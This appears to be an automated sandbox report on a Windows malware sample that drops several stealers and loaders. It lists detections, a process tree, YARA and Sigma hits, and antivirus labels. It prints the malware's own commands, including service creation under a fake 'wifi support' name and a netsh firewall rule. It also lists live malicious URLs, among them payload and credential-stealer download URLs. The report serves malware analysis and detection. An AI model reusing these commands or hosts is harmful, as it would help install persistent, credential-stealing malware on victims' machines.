Play interactive tour

Edit tour

Windows Analysis Report U3E7zMaux2.exe

Overview

General Information

Sample Name:	U3E7zMaux2.exe
Analysis ID:	552969
MD5:	8362e0f91ae3379c73422bbca7bac493
SHA1:	ec761f77bbe9900aed7ffa0a9303dc6801a9effb
SHA256:	adfea20237be615461c44fea423d6043fc74bf1c5303ee33fcecd8acd201291e
Tags:	CoinMinerexe
Infos:
Most interesting Screenshot:

Detection

Amadey Raccoon RedLine SmokeLoader Tofsee Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Amadeys stealer DLL

Detected unpacking (overwrites its own PE header)

Yara detected SmokeLoader

Yara detected Amadey bot

System process connects to network (likely due to code injection or exploit)

Yara detected Raccoon Stealer

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Sigma detected: Suspect Svchost Activity

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Yara detected Vidar stealer

Multi AV Scanner detection for domain / URL

Yara detected Tofsee

Sigma detected: Copying Sensitive Files with Credential Data

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Found evasive API chain (may stop execution after checking mutex)

Uses netsh to modify the Windows network and firewall settings

Found strings related to Crypto-Mining

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Sigma detected: Suspicious Svchost Process

Found evasive API chain (may stop execution after checking locale)

Contains functionality to inject code into remote processes

Deletes itself after installation

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Found many strings related to Crypto-Wallets (likely being stolen)

Drops executables to the windows directory (C:\Windows) and starts them

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

.NET source code references suspicious native API functions

Yara detected BatToExe compiled binary

Found API chain indicative of debugger detection

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

.NET source code contains method to dynamically call methods (often used by packers)

PE file has nameless sections

Machine Learning detection for dropped file

Modifies the windows firewall

Contains functionality to detect sleep reduction / modifications

Found evasive API chain (may stop execution after checking computer name)

Found decision node followed by non-executed suspicious APIs

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Modifies existing windows services

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Sigma detected: Netsh Port or Application Allowed

Found large amount of non-executed APIs

May check if the current machine is a sandbox (GetTickCount - Sleep)

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Creates files inside the system directory

PE file contains sections with non-standard names

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Entry point lies outside standard sections

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Connects to several IPs in different countries

Uses SMTP (mail sending)

Found evaded block containing many API calls

Found evasive API chain (may stop execution after accessing registry keys)

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to query network adapater information

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

U3E7zMaux2.exe (PID: 6688 cmdline: "C:\Users\user\Desktop\U3E7zMaux2.exe" MD5: 8362E0F91AE3379C73422BBCA7BAC493)

U3E7zMaux2.exe (PID: 6728 cmdline: "C:\Users\user\Desktop\U3E7zMaux2.exe" MD5: 8362E0F91AE3379C73422BBCA7BAC493)

explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

D984.exe (PID: 5756 cmdline: C:\Users\user\AppData\Local\Temp\D984.exe MD5: 277680BD3182EB0940BC356FF4712BEF)

WerFault.exe (PID: 6712 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

E666.exe (PID: 4780 cmdline: C:\Users\user\AppData\Local\Temp\E666.exe MD5: 8362E0F91AE3379C73422BBCA7BAC493)

E666.exe (PID: 4388 cmdline: C:\Users\user\AppData\Local\Temp\E666.exe MD5: 8362E0F91AE3379C73422BBCA7BAC493)

7CA1.exe (PID: 5352 cmdline: C:\Users\user\AppData\Local\Temp\7CA1.exe MD5: 3754DB9964B0177B6E905999B6F18FD7)

86C4.exe (PID: 1368 cmdline: C:\Users\user\AppData\Local\Temp\86C4.exe MD5: B11C5DEFDBA76C2B3EE67EE1B474389D)

cmd.exe (PID: 5208 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shayesoq\ MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5464 cmdline: C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\738E.bat C:\Users\user\AppData\Local\Temp\9A02.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

extd.exe (PID: 6816 cmdline: C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" "" MD5: 139B5CE627BC9EC1040A91EBE7830F7C)

cmd.exe (PID: 6392 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\ MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 3496 cmdline: C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)

conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 1716 cmdline: C:\Windows\System32\sc.exe" description shayesoq "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)

conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 4728 cmdline: "C:\Windows\System32\sc.exe" start shayesoq MD5: 24A3E2603E63BCB9695A2935D3B24695)

conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

netsh.exe (PID: 5988 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

8EC4.exe (PID: 6024 cmdline: C:\Users\user\AppData\Local\Temp\8EC4.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)

8EC4.exe (PID: 6240 cmdline: C:\Users\user\AppData\Local\Temp\8EC4.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)

7801.exe (PID: 7032 cmdline: C:\Users\user\AppData\Local\Temp\7801.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)

8ED5.exe (PID: 5992 cmdline: C:\Users\user\AppData\Local\Temp\8ED5.exe MD5: 8B239554FE346656C8EEF9484CE8092F)

mjlooy.exe (PID: 5568 cmdline: "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" MD5: 8B239554FE346656C8EEF9484CE8092F)

9A02.exe (PID: 6000 cmdline: C:\Users\user\AppData\Local\Temp\9A02.exe MD5: 6E7430832C1C24C2BF8BE746F2FE583C)

svchost.exe (PID: 2480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6140 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

uufaeea (PID: 2804 cmdline: C:\Users\user\AppData\Roaming\uufaeea MD5: 8362E0F91AE3379C73422BBCA7BAC493)

uufaeea (PID: 6944 cmdline: C:\Users\user\AppData\Roaming\uufaeea MD5: 8362E0F91AE3379C73422BBCA7BAC493)

svchost.exe (PID: 5444 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5680 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

WerFault.exe (PID: 5788 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 4936 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

lagavljy.exe (PID: 4544 cmdline: C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d"C:\Users\user\AppData\Local\Temp\86C4.exe" MD5: 7A36C0AD3083A1519CCE3A67BB377D18)

svchost.exe (PID: 5940 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000032.00000002.864947877.0000000000BF0000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000013.00000002.784101177.00000000006A1000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000002E.00000003.894641410.00000000022C0000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000032.00000002.864706939.00000000005F0000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0000002C.00000002.861387374.0000000000580000.00000040.00000001.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000028.00000002.923336327.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000015.00000002.797378726.0000000000540000.00000040.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000024.00000002.807575070.0000000000650000.00000004.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000016.00000002.828481056.0000000004401000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000030.00000003.862648627.00000000005E0000.00000004.00000001.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002C.00000003.851523322.00000000006A0000.00000004.00000001.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000028.00000000.820733997.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000030.00000002.940319035.00000000007A9000.00000004.00000001.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000032.00000002.864824644.000000000079A000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000028.00000000.819245011.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000028.00000000.820186557.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000000.700489251.00000000044E1000.00000020.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000015.00000003.780018628.0000000000560000.00000004.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000001.00000002.713149753.00000000004F0000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000013.00000002.783879616.0000000000530000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000002.713456716.0000000002301000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000030.00000002.922320666.00000000005A0000.00000040.00000001.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000028.00000000.819693926.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000032.00000002.864795005.0000000000790000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000002C.00000002.861216810.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000030.00000002.942563144.00000000007CC000.00000004.00000001.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
0000002E.00000003.894589865.0000000002420000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000030.00000002.943525106.00000000007D4000.00000004.00000001.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000030.00000002.922065268.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000C.00000002.766896131.00000000005A1000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000030.00000002.934963218.0000000000751000.00000004.00000001.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0000002E.00000003.894618971.0000000002427000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000024.00000003.803811514.0000000000490000.00000004.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0000000C.00000002.766831607.00000000004F0000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
Process Memory Space: 86C4.exe PID: 1368	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
Process Memory Space: lagavljy.exe PID: 4544	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
Process Memory Space: svchost.exe PID: 5940	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
Process Memory Space: 8EC4.exe PID: 6240	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 7801.exe PID: 7032	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Click to see the 42 entries

Unpacked PEs

Source	Rule	Description	Author
11.2.uufaeea.4615a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
21.2.86C4.exe.400000.0.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
40.0.8EC4.exe.400000.10.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
19.2.E666.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
40.0.8EC4.exe.400000.6.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
40.0.8EC4.exe.400000.8.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.U3E7zMaux2.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
36.2.lagavljy.exe.400000.0.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
21.2.86C4.exe.540e50.1.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
39.2.svchost.exe.320000.0.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
19.0.E666.exe.400000.4.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
19.0.E666.exe.400000.6.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
36.2.lagavljy.exe.400000.0.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
36.2.lagavljy.exe.650000.2.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
1.0.U3E7zMaux2.exe.400000.4.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
1.1.U3E7zMaux2.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
19.1.E666.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
43.2.7801.exe.400000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.2.U3E7zMaux2.exe.5315a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
1.0.U3E7zMaux2.exe.400000.6.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
19.0.E666.exe.400000.5.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
36.2.lagavljy.exe.650000.2.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
36.3.lagavljy.exe.490000.0.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
22.2.8EC4.exe.451f910.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
22.2.8EC4.exe.451f910.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.1.uufaeea.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
40.0.8EC4.exe.400000.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
39.2.svchost.exe.320000.0.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
40.2.8EC4.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
21.3.86C4.exe.560000.0.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
21.2.86C4.exe.400000.0.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
43.2.7801.exe.400000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
17.2.E666.exe.5415a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
40.0.8EC4.exe.400000.12.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.0.U3E7zMaux2.exe.400000.5.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
12.2.uufaeea.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
36.2.lagavljy.exe.470e50.1.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
43.3.7801.exe.4e00000.3.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
43.3.7801.exe.4e00000.3.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Click to see the 34 entries

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity

Show sources

Source: Process started

Author: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d"C:\Users\user\AppData\Local\Temp\86C4.exe", ParentImage: C:\Windows\SysWOW64\shayesoq\lagavljy.exe, ParentProcessId: 4544, ProcessCommandLine: svchost.exe, ProcessId: 5940

Sigma detected: Copying Sensitive Files with Credential Data

Show sources

Source: Process started

Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentImage: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentProcessId: 1368, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\, ProcessId: 6392

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d"C:\Users\user\AppData\Local\Temp\86C4.exe", ParentImage: C:\Windows\SysWOW64\shayesoq\lagavljy.exe, ParentProcessId: 4544, ProcessCommandLine: svchost.exe, ProcessId: 5940

Sigma detected: Netsh Port or Application Allowed

Show sources

Source: Process started

Author: Markus Neis, Sander Wiebing: Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentImage: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentProcessId: 1368, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 5988

Sigma detected: New Service Creation

Show sources

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentImage: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentProcessId: 1368, ProcessCommandLine: C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 3496

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 43.2.7801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.7801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.3.7801.exe.4e00000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.3.7801.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7801.exe PID: 7032, type: MEMORYSTR

Antivirus detection for URL or domain

Show sources

Source: http://185.7.214.171:8080/6.php	URL Reputation: Label: malware
Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.35/d2VxjasuwS/plugins/cred.dll	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\8EC4.exe

Avira: detection malicious, Label: HEUR/AGEN.1211353

Multi AV Scanner detection for submitted file

Show sources

Source: U3E7zMaux2.exe	Virustotal: Detection: 41%			Perma Link
Source: U3E7zMaux2.exe	ReversingLabs: Detection: 46%

Multi AV Scanner detection for domain / URL

Show sources

Source: http://185.215.113.35/d2VxjasuwS/index.php?scr=1	Virustotal: Detection: 12%			Perma Link
Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exe	Virustotal: Detection: 16%			Perma Link

Machine Learning detection for sample

Show sources

Source: U3E7zMaux2.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\7801.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8ED5.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9A02.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Joe Sandbox ML: detected

Source: 43.3.7801.exe.4d60000.2.unpack	Avira: Label: TR/Crypt.EPACK.Gen2
Source: 21.2.86C4.exe.540e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 21.3.86C4.exe.560000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 36.2.lagavljy.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 20.2.7CA1.exe.570e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 36.3.lagavljy.exe.490000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 36.2.lagavljy.exe.650000.2.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 39.2.svchost.exe.320000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 21.2.86C4.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 36.2.lagavljy.exe.470e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 20.3.7CA1.exe.590000.0.unpack	Avira: Label: TR/Patched.Ren.Gen

